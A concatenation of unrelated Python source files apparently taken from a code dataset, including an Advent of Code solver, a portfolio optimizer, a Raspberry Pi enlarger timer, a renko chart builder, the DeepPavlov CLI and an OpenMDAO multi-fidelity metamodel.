            # BUG FIX: decide per cell.  The original mutated `char` to
            # 'X' on the first crossing and then mislabelled every later
            # cell of the same segment as an intersection.
            grid[pos] = 'X' if grid[pos] != '.' else char
        pos = (pos[0] + dx, pos[1] + dy)
        grid[pos] = '+'  # corners overwrite, matching the original

    print(sorted([manhattan((0, 0), pos)
                  for (pos, x) in grid.items() if x == 'X'])[0])
# Sample-input run kept for reference:
# with open('test.txt', 'r') as f:
#     input = f.read().splitlines()
# solve(input)

# Solve the real puzzle input (one wire path per line).
with open('input.txt', 'r') as f:
    input = f.read().splitlines()
solve(input)
3316215 | # import necessary libraries
import pandas_datareader as web
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from datetime import date
import optimal_portfolio as opt_func
import return_portfolios as ret_port_func
import scipy.stats as stats
import seaborn as sns
import cvxopt as opt
from cvxopt import blas, solvers
# choose plot style
plt.style.use('seaborn')
sns.set_palette("pastel")
# ignore certain mathematical errors (in case)
#np.seterr(divide='ignore', invalid='ignore')
# get user input (6 tickers and monthly expected return) and print.
# NOTE(review): er_input_monthly is not validated; a non-numeric entry
# raises ValueError at the float() conversion below.
ticker1 = input("Input your first selected ticker symbol")
ticker2 = input("Input your second selected ticker symbol")
ticker3 = input("Input your third selected ticker symbol")
ticker4 = input("Input your fourth selected ticker symbol")
ticker5 = input("Input your fifth selected ticker symbol")
ticker6 = input("Input your sixth selected ticker symbol")
er_input_monthly = input("What is your monthly expected rate of return? (%)")
# Convert monthly % to an average daily rate (252 trading days/year).
user_er_daily = ((float(er_input_monthly)/100) * 12) / 252
print('')
print("Desired Monthly Return: " + str(er_input_monthly) + "%")
print('')
print("Desired Daily Return: " + str(user_er_daily) + "%")
# putting user-entered tickers in a list and printing
symbols = [ticker1, ticker2, ticker3,ticker4,ticker5,ticker6]
print('')
print(symbols)
# creating numpy array out of symbols list in case of future need
symbols_array = np.array(symbols)
#backup list of selected symbols
#symbols = ['MSFT', 'AMZN', 'AAPL', 'GOOG', 'FB', 'AMD']
# Date range for the price history: 2016 through today.
start_date ='2016-01-01'
end_date = date.today()
# backup end date
#end_date ='2021-05-01'
# Retrieving data from the Yahoo Finance API through pandas-datareader.
stock_data = (web.get_data_yahoo(symbols, start_date, end_date)).dropna()
stock_data = pd.DataFrame(stock_data)
#Viewing data
#print(stock_data)
# slicing data pulled from yahoo to select only the adj close of each ticker
selected = list((stock_data.columns[0:len(symbols)]))
# calculating the daily returns, dropping rows with empty values
returns_daily = stock_data[selected].pct_change().dropna()
# calculating the expected return by calculating the mean
expected_returns = returns_daily.mean()
# calculating the covariance matrix of the portfolio to determine
# correlation between tickers
cov_daily = returns_daily.cov()
# printing covariance matrix
print(expected_returns)
print('')
print("Covariance Matrix: ")
print('')
print(cov_daily)
print('')
returnsdf = pd.DataFrame(returns_daily)
returnsdf.columns = symbols
returnsdf = returnsdf.reset_index()
#returnsdf.to_csv('daily_returns.csv')
# Gathering index (S&P 500) and risk-free rate (10-yr Treasury, ^TNX)
# data for portfolio comparison and Sharpe measure computation
index_data = (web.get_data_yahoo('^GSPC', start_date, end_date)).dropna()
index_data = pd.DataFrame(index_data)
index_daily_returns = index_data['Adj Close'].pct_change().dropna()
index_expected_returns = index_daily_returns.mean()
rf_data = (web.get_data_yahoo('^TNX', start_date, end_date)).dropna()
rf_data = pd.DataFrame(rf_data)
rf_daily = rf_data['Adj Close'].pct_change().dropna()
rf = rf_daily.mean()
#print(index_expected_returns)
##########################
# calculating the standard deviation of each ticker in the portfolio
single_asset_std = np.sqrt(np.diagonal(cov_daily))
print('')
# calculating the normality of the returns of the entire portfolio
# (Jarque-Bera test statistic and p-value)
print(stats.jarque_bera(returns_daily))
print('')
# calling function to create random portfolios with corresponding risk
# and return relationships
df_port = ret_port_func.return_portfolios(expected_returns, cov_daily)
# calling function to produce the efficient frontier, returning weights,
# returns, risks, and the set of portfolios
weights, returns, risks, portfolios = opt_func.optimal_portfolio(returns_daily[1:])
# Convert daily frontier returns to monthly equivalents.
returns_monthly = [(i*252)/12 for i in returns]
# converting portfolios set into a pandas dataframe, adding ticker
# symbols as column headers for readability
portfoliosdf = pd.DataFrame(portfolios)
portfoliosdf.columns = symbols
portfoliosdf = portfoliosdf.reset_index()
# appending Expected Return and Risk columns to the optimal portfolios dataframe
portfoliosdf['Expected Return'] = returns
portfoliosdf['Risk'] = risks
# calculating the MVP; assumes the frontier is sorted from riskiest
# (row 0) to least risky (row 99) -- TODO confirm in optimal_portfolio
mvp = portfoliosdf.iloc[99] # minimum variance portfolio(least risky)
# calculating the MRP
mrp = portfoliosdf.iloc[0] # maximum risk portfolio(most risky)
# locating the corner portfolios with the closest expected return to the
# user desired expected return
chosen_portfolios = portfoliosdf.iloc[(portfoliosdf['Expected Return']-user_er_daily).abs().argsort()[:2]]
chosen_portfolios = chosen_portfolios.reset_index()
# creating a new dataset to compare the chosen corner portfolios with a
# market index (index row gets zero weights and daily risk 1/252)
index_chosen_port = chosen_portfolios.copy(deep=True)
index_chosen_port.loc[len(index_chosen_port.index)] = ['101', 'index', 0, 0,0,0,0,0, index_expected_returns, 1/252]
index_chosen_port['Names'] = ['Optimal Portfolio 1', 'Optimal Portfolio 2', 'S&P 500 Index']
index_chosen_port['Expected Returns Monthly'] = (index_chosen_port['Expected Return']*252)/12
index_chosen_port['Sharpe Ratio'] = ((index_chosen_port['Expected Return'] - rf) / (index_chosen_port['Risk']))*252/12
index_chosen_port.to_csv('index_chosen_port.csv')
print(chosen_portfolios)
print(index_chosen_port.head())
### work in progress ###
"""
ticker1_weight = [chosen_portfolios.iloc[0][ticker1]]
ticker2_weight = [chosen_portfolios.iloc[0][ticker2]]
ticker3_weight = [chosen_portfolios.iloc[0][ticker3]]
ticker4_weight = [chosen_portfolios.iloc[0][ticker4]]
ticker5_weight = [chosen_portfolios.iloc[0][ticker5]]
ticker6_weight = [chosen_portfolios.iloc[0][ticker6]]
#print(ticker1_weight)
chosen_returns = pd.DataFrame()
chosen_returns['Date'] = returnsdf['Date']
chosen_returns['optimal1'] = returnsdf[ticker1] * ticker1_weight
chosen_returns['optimal2'] = returnsdf[ticker2] * ticker2_weight
chosen_returns['optimal3'] = returnsdf[ticker3] * ticker3_weight
chosen_returns['optimal4'] = returnsdf[ticker4] * ticker4_weight
chosen_returns['optimal5'] = returnsdf[ticker5] * ticker5_weight
chosen_returns['optimal6'] = returnsdf[ticker6] * ticker6_weight
chosen_returns['daily_return'] = chosen_returns['optimal1'] + chosen_returns['optimal2'] + chosen_returns['optimal3'] + chosen_returns['optimal4'] + chosen_returns['optimal5'] + chosen_returns['optimal6']
#chosen_returns.to_csv('chosen_returns.csv')
"""
################
# printing optimal portfolios dataframe to a CSV file for reference
portfoliosdf.to_csv('markowitz_portfolios.csv')
#print(portfoliosdf)
# plotting efficient frontier with highlighted chosen portfolios closest to user's desired return
df_port.plot.scatter(x='Volatility', y='Returns', fontsize=12, color = 'steelblue', alpha=0.5)
plt.plot(risks, returns, color = 'mediumseagreen', marker = 'o', alpha = 0.80)
plt.plot(chosen_portfolios['Risk'], chosen_portfolios['Expected Return'], color = 'tomato', marker = '*',markersize=14)
plt.ylabel('Expected Returns(Daily)',fontsize=14)
plt.xlabel('Volatility (Std. Deviation)',fontsize=14)
plt.title('Efficient Frontier', fontsize=24)
plt.show()
#### WORK IN PROGRESS #### visualize optimal portfolios vs index
plt.figure(figsize=(8,4))
sns.barplot(data=index_chosen_port, x='Names', y='Expected Returns Monthly', palette=['limegreen', 'turquoise', 'mediumpurple'], alpha=0.85)
plt.title('Optimal Portfolios Returns compared to Market Index')
plt.ylabel('Expected Returns(Monthly)',fontsize=12)
plt.xlabel('')
plt.show()
### visualizing an individual ticker's returns with the returns of the entire efficient frontier
plt.figure(figsize=(12,8))
plt.subplot(211)
sns.barplot(data=returnsdf, x='Date', y=ticker1)
plt.title('Daily returns ' + str(ticker1), fontsize = 20)
plt.xticks([])
plt.ylabel('Returns',fontsize=14)
plt.xlabel('Time',fontsize=14)
plt.subplot(212)
sns.barplot(data=portfoliosdf, x='index', y="Expected Return")
plt.xticks([])
plt.xlabel('')
plt.title('Markowitz Portfolios Expected Returns', fontsize=20)
plt.show()
#####
# plotting the distribution of returns of each ticker in the portfolio
plt.figure(figsize= (14,8))
plt.subplot(231)
sns.distplot(returnsdf[ticker1], color='g')
plt.title('Distribution of returns: ' + str(ticker1), fontsize = 14)
plt.subplot(232)
sns.distplot(returnsdf[ticker2], color='b')
plt.title('Distribution of returns: ' + str(ticker2), fontsize = 14)
plt.subplot(233)
sns.distplot(returnsdf[ticker3], color='purple')
plt.title('Distribution of returns: ' + str(ticker3), fontsize = 14)
plt.subplot(234)
sns.distplot(returnsdf[ticker4], color='orange')
plt.title('Distribution of returns: ' + str(ticker4), fontsize = 14)
plt.subplot(235)
sns.distplot(returnsdf[ticker5], color='red')
plt.title('Distribution of returns: ' + str(ticker5), fontsize = 14)
plt.subplot(236)
sns.distplot(returnsdf[ticker6], color='yellow')
plt.title('Distribution of returns: ' + str(ticker6), fontsize = 14)
plt.subplots_adjust(hspace=0.5)
plt.show()
#plt.figure(figsize=(14, 8))
#sns.barplot(data=chosen_returns, x="Date", y="daily_return", color = 'b')
#sns.barplot(data=returnsdf, x="Date", y=ticker1, alpha=0.6, color = 'r')
#plt.title('Daily Returns of Optimal Chosen Portfolio vs ' + str(ticker1), fontsize = 14)
#plt.legend()
#plt.show()
| StarcoderdataPython |
1742777 | <reponame>cdgriffith/darkroom
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time
from threading import Thread
from gpiozero import OutputDevice
class Enlarger(OutputDevice):
    """Darkroom enlarger lamp driven through a single GPIO pin.

    The pin is wired active-low: writing ``False`` turns the lamp on and
    ``True`` turns it off, hence the inverted ``_write`` calls below.
    A timed exposure runs on two daemon threads: one switches the lamp
    off after ``length`` seconds, the other periodically redraws the
    remaining time via a caller-supplied ``draw`` callback.
    """

    def __init__(self, pin):
        """Initialise the output pin high (lamp off) and reset all state."""
        super(Enlarger, self).__init__(pin, initial_value=True)
        self.printing = False     # True while a timed exposure is in progress
        self.print_thread = None  # worker that switches the lamp off
        self.timer_thread = None  # worker that redraws the countdown
        self.draw = None          # callback receiving the remaining seconds
        self.state = False        # logical lamp state (True == on)
        self.length = 0           # seconds remaining in the current exposure
        self.off()

    def toggle(self):
        """Flip the lamp state; refused (returns False) during an exposure."""
        if self.printing:
            return False
        if self.state:
            self.off()
        else:
            self.on()

    def on(self):
        """Turn the lamp on (active-low pin, so write False)."""
        self.state = True
        self._write(False)

    def off(self):
        """Turn the lamp off (active-low pin, so write True)."""
        self.state = False
        self._write(True)

    def execute(self, length, draw):
        """Start a timed exposure of *length* seconds.

        *draw* is a callable taking the remaining time; it is invoked
        periodically from a background thread.  Returns False if an
        exposure is already running.
        """
        if self.printing:
            return False
        self.printing = True
        self.draw = draw
        self.length = length
        # daemon=True (modern replacement for the deprecated setDaemon())
        # so a stuck exposure can never block interpreter shutdown.
        self.timer_thread = Thread(target=self._timer, daemon=True)
        self.print_thread = Thread(target=self._print_off, daemon=True)
        self.print_thread.start()
        self.timer_thread.start()

    def _timer(self):
        """Redraw the countdown while the exposure runs, then restore it."""
        initial = self.length
        while self.length > 0:
            self.draw(self.length)
            if not self.printing:
                # exposure was cancelled: restore the original value and stop
                self.draw(initial)
                return
            time.sleep(0.2)
        self.draw(initial)

    def _print_off(self):
        """Hold the lamp on for the requested time, then switch it off."""
        self.on()
        end_time = time.time() + self.length
        while self.length > 0:
            if not self.printing:
                return
            time.sleep(0.05)
            self.length -= 0.05
            # wall-clock check guards against sleep() overshoot accumulating
            if time.time() >= end_time:
                break
        self.printing = False
        self.off()
        self.length = 0

    def cancel(self):
        """Abort any running exposure and turn the lamp off."""
        self.off()
        self.printing = False
        self.print_thread = None
        # bug fix: was assigned False, inconsistent with the None used
        # everywhere else for "no thread"
        self.timer_thread = None
        self.length = 0
| StarcoderdataPython |
1751573 | # -*- coding: utf-8 -*-
#
"""WLSQM (Weighted Least SQuares Meshless): a fast and accurate meshless least-squares interpolator for Python, for scalar-valued data defined as point values on 1D, 2D and 3D point clouds.
A general overview can be found in the README.
For the API, refer to wlsqm.fitter.simple and wlsqm.fitter.expert.
When imported, this module imports all symbols from the following modules to the local namespace:
wlsqm.fitter.defs # definitions (constants) (common)
wlsqm.fitter.simple # simple API
wlsqm.fitter.interp # interpolation of fitted model (for simple API)
wlsqm.fitter.expert # advanced API
This makes the names available as wlsqm.fit_2D(), wlsqm.ExpertSolver, etc.
JJ 2017-02-22
"""
# absolute_import: https://www.python.org/dev/peps/pep-0328/
from __future__ import division, print_function, absolute_import
__version__ = '0.1.6'
from .fitter.defs import * # definitions (constants) (common)
from .fitter.simple import * # simple API
from .fitter.interp import * # interpolation of fitted model (for simple API)
from .fitter.expert import * # advanced API
| StarcoderdataPython |
21885 | import atrlib
import pandas as pd
# module for calculation of data for renko graph
def renko(df):
    """Convert OHLCV candles into renko bricks.

    Builds fixed-size bricks (size from atrlib.brick_size, presumably
    ATR-based -- TODO confirm) from a DataFrame with columns
    'date', 'open', 'close', 'volume'.  Returns a new DataFrame with
    columns date/open/close/low/high/volume, one row per brick.
    """
    # parallel lists: dates, lows, highs, last-brick opens/closes, volumes
    d , l , h ,lbo ,lbc,vol=[],[],[],[],[],[]
    brick_size = atrlib.brick_size(df)
    # volume accumulated since the last emitted brick
    volume = 0.0
    for i in range(0,len(df)):
        if i==0:
            # seed the first brick directly from the first candle;
            # direction is taken from whether the candle closed up or down
            if(df['close'][i]>df['open'][i]):
                d.append(df['date'][i])
                l.append(df['open'][i])
                h.append(df["close"][i])
                lbo.append(df["open"][i])
                lbc.append(df["close"][i])
                vol.append(df['volume'][i])
            else:
                d.append(df['date'][i])
                l.append(df['close'][i])
                h.append(df["open"][i])
                lbo.append(df["open"][i])
                lbc.append(df["close"][i])
                vol.append(df['volume'][i])
        else:
            volume += df["volume"][i]
            leng = len(lbo)
            if(lbc[leng-1]>lbo[leng-1]):
                # previous brick was an up-brick
                if(df["close"][i]>=(lbc[leng-1]+brick_size)):
                    # continuation: stack a new up-brick on top
                    lbc.append((lbc[leng-1]+brick_size))
                    lbo.append(lbc[leng-1])
                    l.append(lbc[leng-1])
                    h.append((lbc[leng-1]+brick_size))
                    d.append(df["date"][i])
                    vol.append(volume)
                    volume = 0.0
                elif(df["close"][i]<=(lbo[leng-1]-brick_size)):
                    # reversal: down-brick measured from the previous open
                    lbc.append((lbo[leng-1]-brick_size))
                    lbo.append(lbo[leng-1])
                    h.append(lbo[leng-1])
                    l.append((lbo[leng-1]-brick_size))
                    d.append(df["date"][i])
                    vol.append(volume)
                    volume = 0.0
            else:
                # previous brick was a down-brick
                if(df["close"][i]>=(lbo[leng-1]+brick_size)):
                    # reversal: up-brick measured from the previous open
                    lbc.append((lbo[leng-1]+brick_size))
                    lbo.append(lbo[leng-1])
                    l.append(lbo[leng-1])
                    h.append((lbo[leng-1]+brick_size))
                    d.append(df["date"][i])
                    vol.append(volume)
                    volume = 0.0
                elif(df["close"][i]<=(lbc[leng-1]-brick_size)):
                    # continuation: stack a new down-brick below
                    lbc.append((lbc[leng-1]-brick_size))
                    lbo.append(lbc[leng-1])
                    h.append(lbc[leng-1])
                    l.append((lbc[leng-1]-brick_size))
                    d.append(df["date"][i])
                    vol.append(volume)
                    volume = 0.0
    # NOTE(review): only one brick is emitted per input candle even if the
    # move spans several brick sizes, and the trailing partial volume is
    # dropped -- confirm this is intended.
    data_ = pd.DataFrame(d,columns=["date"])
    data_["open"] = lbo
    data_["close"] =lbc
    data_["low"] = l
    data_["high"] = h
    data_['volume']=vol
    return data_
| StarcoderdataPython |
1748584 | <reponame>khakhulin/DeepPavlov<filename>deeppavlov/deep.py<gh_stars>0
"""
Copyright 2017 Neural Networks and Deep Learning lab, MIPT
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
from pathlib import Path
import sys
import os
p = (Path(__file__) / ".." / "..").resolve()
sys.path.append(str(p))
from deeppavlov.core.commands.train import train_evaluate_model_from_config
from deeppavlov.core.commands.infer import interact_model, predict_on_stream
from deeppavlov.core.common.log import get_logger
from deeppavlov.download import deep_download
from utils.telegram_utils.telegram_ui import interact_model_by_telegram
from utils.server_utils.server import start_model_server
log = get_logger(__name__)
# Command-line interface: a positional mode selector plus the pipeline
# config path, and optional flags consumed by the corresponding modes.
parser = argparse.ArgumentParser()

parser.add_argument("mode", help="select a mode, train or interact", type=str,
                    choices={'train', 'evaluate', 'interact', 'predict', 'interactbot', 'riseapi', 'download'})

parser.add_argument("config_path", help="path to a pipeline json config", type=str)
# used only by 'interactbot' (may also come from the TELEGRAM_TOKEN env var)
parser.add_argument("-t", "--token", help="telegram bot token", type=str)
# used only by 'predict'
parser.add_argument("-b", "--batch-size", dest="batch_size", default=1, help="inference batch size", type=int)
parser.add_argument("-f", "--input-file", dest="file_path", default=None, help="Path to the input file", type=str)
parser.add_argument("-d", "--download", action="store_true", help="download model components")
def find_config(pipeline_config_path: str):
    """Resolve a pipeline config reference to a concrete path.

    If *pipeline_config_path* is already an existing file it is returned
    unchanged.  Otherwise it is treated as a bare config name and looked
    up under the package's ``configs/`` tree; the first match is used.
    If nothing matches, the original string is returned as-is.
    """
    if Path(pipeline_config_path).is_file():
        return pipeline_config_path

    pattern = f'configs/**/{pipeline_config_path}.json'
    candidates = []
    for candidate in Path(__file__).parent.glob(pattern):
        # requiring the stem to end with the requested name is a simple
        # way to not allow * and ? in the lookup
        if str(candidate.with_suffix('')).endswith(pipeline_config_path):
            candidates.append(candidate)

    if candidates:
        log.info(f"Interpreting '{pipeline_config_path}' as '{candidates[0]}'")
        return str(candidates[0])
    return pipeline_config_path
def main():
    """Entry point: parse CLI arguments and dispatch to the selected mode."""
    args = parser.parse_args()
    pipeline_config_path = find_config(args.config_path)

    # downloading can be requested either via -d or as a standalone mode
    if args.download or args.mode == 'download':
        deep_download(['-c', pipeline_config_path])
    # the bot token may come from the CLI flag or the environment
    token = args.token or os.getenv('TELEGRAM_TOKEN')

    if args.mode == 'train':
        train_evaluate_model_from_config(pipeline_config_path)
    elif args.mode == 'evaluate':
        # evaluation on the test split only: skip training and validation
        train_evaluate_model_from_config(pipeline_config_path, to_train=False, to_validate=False)
    elif args.mode == 'interact':
        interact_model(pipeline_config_path)
    elif args.mode == 'interactbot':
        if not token:
            log.error('Token required: initiate -t param or TELEGRAM_TOKEN env var with Telegram bot token')
        else:
            interact_model_by_telegram(pipeline_config_path, token)
    elif args.mode == 'riseapi':
        start_model_server(pipeline_config_path)
    elif args.mode == 'predict':
        predict_on_stream(pipeline_config_path, args.batch_size, args.file_path)
if __name__ == "__main__":
main()
| StarcoderdataPython |
## PRINTING A SINGLE CUSTOM CHARACTER
'''
Take a look at this code, which prints a single smiley face character to the display:
'''

from RPLCD import CharLCD, cleared, cursor  # LCD driver library
from RPi import GPIO  # Raspberry Pi GPIO access

# Initializing the LCD Display (HD44780-compatible 16x2, 4-bit data bus)
lcd = CharLCD(numbering_mode=GPIO.BOARD, cols=16, rows=2, pin_rs=37, pin_e=35, pins_data=[33, 31, 29, 23])

# 5x8 pixel bitmap of a smiley face, one byte per pixel row (low 5 bits used)
smiley = (
    0b00000,
    0b01010,
    0b01010,
    0b00000,
    0b10001,
    0b10001,
    0b01110,
    0b00000,
)

# Store the bitmap in CGRAM slot 0, then write that slot to the display.
lcd.create_char(0, smiley)
# Fix: unichr() only exists in Python 2 and raises NameError on Python 3.
# Writing the character '\x00' addresses CGRAM slot 0 on both versions.
lcd.write_string('\x00')

# Always Clean Up the GPIO after using the code
GPIO.cleanup()
3283503 | <filename>openmdao/components/multifi_meta_model.py
"""Define the MultiFiMetaModel class."""
import numpy as np
from openmdao.components.meta_model import MetaModel
def _get_name_fi(name, fi_index):
"""
Generate variable name taking into account fidelity level.
Parameters
----------
name : str
base name
fi_index : int
fidelity level
Returns
-------
str
variable name
"""
if fi_index > 0:
return "%s_fi%d" % (name, fi_index + 1)
else:
return name
class MultiFiMetaModel(MetaModel):
    """
    Generalize MetaModel to be able to train surrogates with multi-fidelity training inputs.

    For a given number of levels of fidelity **nfi** (given at initialization)
    the corresponding training input variables *train:[invar]_fi[2..nfi]* and
    *train:[outvar]_fi[2..nfi]* are automatically created
    besides the given *train:[invar]* and *train:[outvar]* variables.
    Note the index starts at 2, the index 1 is omitted considering
    the simple name *var* is equivalent to *var_fi1* which is intended
    to be the data of highest fidelity.

    The surrogate models are trained with a list of (m samples, n dim)
    ndarrays built from the various training input data. By convention,
    the fidelities are intended to be ordered from highest to lowest fidelity.
    Obviously for a given level of fidelity corresponding lists
    *train:[var]_fi[n]* have to be of the same size.

    Thus given the initialization::

    >>> mm = MultiFiMetaModel(nfi=2)
    >>> mm.add_input('x1', 0.)
    >>> mm.add_input('x2', 0.)
    >>> mm.add_output('y1', 0.)
    >>> mm.add_output('y2', 0.)

    the following supplementary training input variables
    ``train:x1_fi2`` and ``train:x2_fi2`` are created together with the classic
    ones ``train:x1`` and ``train:x2`` and the output variables ``train:y1_fi2``
    and ``train:y2_fi2`` are created as well.
    The embedded surrogate for y1 will be trained with a couple (X, Y).

    Where X is the list [X_fi1, X_fi2] where X_fi1 is an (m1, 2) ndarray
    filled with the m1 samples [x1 value, x2 value], X_fi2 is an (m2, 2) ndarray
    filled with the m2 samples [x1_fi2 value, x2_fi2 value]

    Where Y is a list [Y1_fi1, Y1_fi2] where Y1_fi1 is a (m1, 1) ndarray of
    y1 values and Y1_fi2 a (m2, 1) ndarray y1_fi2 values.

    .. note:: when *nfi* ==1 a :class:`MultiFiMetaModel` object behaves as
       a :class:`MetaModel` object.
    """

    def __init__(self, nfi=1):
        """
        Initialize all attributes.

        Parameters
        ----------
        nfi : int
            number of levels of fidelity
        """
        super(MultiFiMetaModel, self).__init__()

        self._nfi = nfi

        # generalize MetaModel training inputs to a list of training inputs,
        # one (m, n) block per fidelity level
        self._training_input = nfi * [np.zeros(0)]
        # total flattened input size per fidelity level
        self._input_sizes = nfi * [0]

    def add_input(self, name, val=1.0, **kwargs):
        """
        Add an input variable to the component.

        Besides the regular ``train:<name>`` option declared by the base
        class, declares ``train:<name>_fi<n>`` options for every extra
        fidelity level.

        Parameters
        ----------
        name : str
            name of the variable in this component's namespace.
        val : float or list or tuple or ndarray or Iterable
            The initial value of the variable being added in user-defined units.
            Default is 1.0.
        shape : int or tuple or list or None
            Shape of this variable, only required if src_indices not provided and
            val is not an array. Default is None.
        src_indices : int or list of ints or tuple of ints or int ndarray or Iterable or None
            The global indices of the source variable to transfer data from.
            If val is given as an array_like object, the shapes of val and
            src_indices must match. A value of None implies this input depends
            on all entries of source. Default is None.
        units : str or None
            Units in which this input variable will be provided to the component
            during execution. Default is None, which means it is unitless.
        desc : str
            description of the variable
        var_set : hashable object
            For advanced users only. ID or color for this variable, relevant for
            reconfigurability. Default is 0.
        """
        metadata = super(MultiFiMetaModel, self).add_input(name, val, **kwargs)
        input_size = metadata['value'].size

        # fidelity 0 tracks the cumulative size maintained by the parent class
        # (assumes MetaModel.add_input keeps self._input_size up to date --
        # TODO confirm against the base class)
        self._input_sizes[0] = self._input_size

        # Add train:<invar>_fi<n>
        for fi in range(self._nfi):
            if fi > 0:
                name_with_fi = 'train:' + _get_name_fi(name, fi)
                self.metadata.declare(name_with_fi, desc='Training data for %s' % name_with_fi)
                self._input_sizes[fi] += input_size

    def add_output(self, name, val=1.0, **kwargs):
        """
        Add an output variable to the component.

        Besides the regular ``train:<name>`` option declared by the base
        class, declares ``train:<name>_fi<n>`` options for every extra
        fidelity level and initializes the per-fidelity training storage.

        Parameters
        ----------
        name : str
            name of the variable in this component's namespace.
        val : float or list or tuple or ndarray
            The initial value of the variable being added in user-defined units. Default is 1.0.
        shape : int or tuple or list or None
            Shape of this variable, only required if val is not an array.
            Default is None.
        units : str or None
            Units in which the output variables will be provided to the component during execution.
            Default is None, which means it has no units.
        res_units : str or None
            Units in which the residuals of this output will be given to the user when requested.
            Default is None, which means it has no units.
        desc : str
            description of the variable.
        lower : float or list or tuple or ndarray or Iterable or None
            lower bound(s) in user-defined units. A value of None means this output
            has no lower bound. Default is None.
        upper : float or list or tuple or ndarray or Iterable or None
            upper bound(s) in user-defined units. A value of None means this output
            has no upper bound. Default is None.
        ref : float
            Scaling parameter. The value in the user-defined units of this output variable when
            the scaled value is 1. Default is 1.
        ref0 : float
            Scaling parameter. The value in the user-defined units of this output variable when
            the scaled value is 0. Default is 0.
        res_ref : float
            Scaling parameter. The value in the user-defined res_units of this output's residual
            when the scaled value is 1. Default is 1.
        var_set : hashable object
            For advanced users only. ID or color for this variable, relevant for reconfigurability.
            Default is 0.
        """
        super(MultiFiMetaModel, self).add_output(name, val, **kwargs)
        # one empty training block per fidelity level for this output
        self._training_output[name] = self._nfi * [np.zeros(0)]

        # Add train:<outvar>_fi<n>
        for fi in range(self._nfi):
            if fi > 0:
                name_with_fi = 'train:' + _get_name_fi(name, fi)
                self.metadata.declare(name_with_fi, desc='Training data for %s' % name_with_fi)

    def _train(self):
        """
        Override MetaModel _train method to take into account multi-fidelity input data.

        Validates that all training lists agree in length per fidelity,
        assembles (m, n) input blocks and (m, output_size) output blocks
        per fidelity (appending to previous data when ``warm_restart`` is
        set), and hands them to each output's surrogate via
        ``train_multifi``.
        """
        if self._nfi == 1:
            # shortcut: fallback to base class behaviour immediatly
            super(MultiFiMetaModel, self)._train()
            return

        # --- validation: every train: list must be consistent per fidelity ---
        num_sample = self._nfi * [None]
        for name, sz in self._surrogate_input_names:
            for fi in range(self._nfi):
                name = _get_name_fi(name, fi)
                val = self.metadata['train:' + name]
                if num_sample[fi] is None:
                    num_sample[fi] = len(val)
                elif len(val) != num_sample[fi]:
                    msg = "MetaModel: Each variable must have the same number"\
                          " of training points. Expected {0} but found {1} "\
                          "points for '{2}'."\
                          .format(num_sample[fi], len(val), name)
                    raise RuntimeError(msg)

        for name, shape in self._surrogate_output_names:
            for fi in range(self._nfi):
                name = _get_name_fi(name, fi)
                val = self.metadata['train:' + name]
                if len(val) != num_sample[fi]:
                    msg = "MetaModel: Each variable must have the same number" \
                          " of training points. Expected {0} but found {1} " \
                          "points for '{2}'." \
                          .format(num_sample[fi], len(val), name)
                    raise RuntimeError(msg)

        # --- allocate input blocks (optionally keeping previous data) ---
        if self.warm_restart:
            inputs = []
            new_inputs = self._nfi * [None]
            num_old_pts = self._nfi * [0]
            for fi in range(self._nfi):
                num_old_pts[fi] = self._training_input[fi].shape[0]
                inputs.append(np.zeros((num_sample[fi] + num_old_pts[fi],
                                        self._input_sizes[fi])))
                if num_old_pts[fi] > 0:
                    inputs[fi][:num_old_pts[fi], :] = self._training_input[fi]
                # new_inputs views the yet-unfilled tail rows of each block
                new_inputs[fi] = inputs[fi][num_old_pts[fi]:, :]
        else:
            inputs = [np.zeros((num_sample[fi], self._input_sizes[fi]))
                      for fi in range(self._nfi)]
            new_inputs = inputs

        self._training_input = inputs

        # add training data for each input
        idx = self._nfi * [0]  # current column offset per fidelity
        for name, sz in self._surrogate_input_names:
            for fi in range(self._nfi):
                if num_sample[fi] > 0:
                    name = _get_name_fi(name, fi)
                    val = self.metadata['train:' + name]
                    if isinstance(val[0], float):
                        # scalar input: occupies a single column
                        new_inputs[fi][:, idx[fi]] = val
                        idx[fi] += 1
                    else:
                        # array input: flatten each sample into sz columns
                        # NOTE(review): idx[fi] is not advanced by sz here --
                        # confirm whether mixed scalar/array inputs are supported
                        for row_idx, v in enumerate(val):
                            if not isinstance(v, np.ndarray):
                                v = np.array(v)
                            new_inputs[fi][row_idx, idx[fi]:idx[fi] + sz] = v.flat

        # add training data for each output
        outputs = self._nfi * [None]
        new_outputs = self._nfi * [None]
        for name, shape in self._surrogate_output_names:
            for fi in range(self._nfi):
                name_fi = _get_name_fi(name, fi)
                if num_sample[fi] > 0:
                    output_size = np.prod(shape)
                    if self.warm_restart:
                        outputs[fi] = np.zeros((num_sample[fi] + num_old_pts[fi],
                                                output_size))
                        if num_old_pts[fi] > 0:
                            outputs[fi][:num_old_pts[fi], :] = self._training_output[name][fi]
                        self._training_output[name][fi] = outputs[fi]
                        new_outputs[fi] = outputs[fi][num_old_pts[fi]:, :]
                    else:
                        outputs[fi] = np.zeros((num_sample[fi], output_size))
                        self._training_output[name] = []
                        self._training_output[name].extend(outputs)
                        new_outputs = outputs

                    val = self.metadata['train:' + name_fi]
                    if isinstance(val[0], float):
                        new_outputs[fi][:, 0] = val
                    else:
                        for row_idx, v in enumerate(val):
                            if not isinstance(v, np.ndarray):
                                v = np.array(v)
                            new_outputs[fi][row_idx, :] = v.flat

            # train this output's surrogate on all fidelity blocks at once
            surrogate = self._metadata(name).get('surrogate')
            if surrogate is not None:
                surrogate.train_multifi(self._training_input,
                                        self._training_output[name])

        self.train = False
| StarcoderdataPython |
1694801 | from tests import app
@app.route("/error-assert-newline")
def error_assert_newline():
    # Test fixture endpoint: the body deliberately ends with two newlines so
    # tests can assert how trailing whitespace in responses is handled.
    return '<p>Hello</p>\n\n'
| StarcoderdataPython |
38642 | """
Solution of the Sellar analytical problem using classic BLISS.
(Bi-Level Integrated System Synthesis)
MDA solved with a Broyden solver.
Global sensitivity calculated by finite-differencing the MDA-coupled
system. The MDA should be replaced with solution of the GSE to fully
match the original Sobiesky-Agte implementation.
"""
from openmdao.main.api import Assembly, SequentialWorkflow
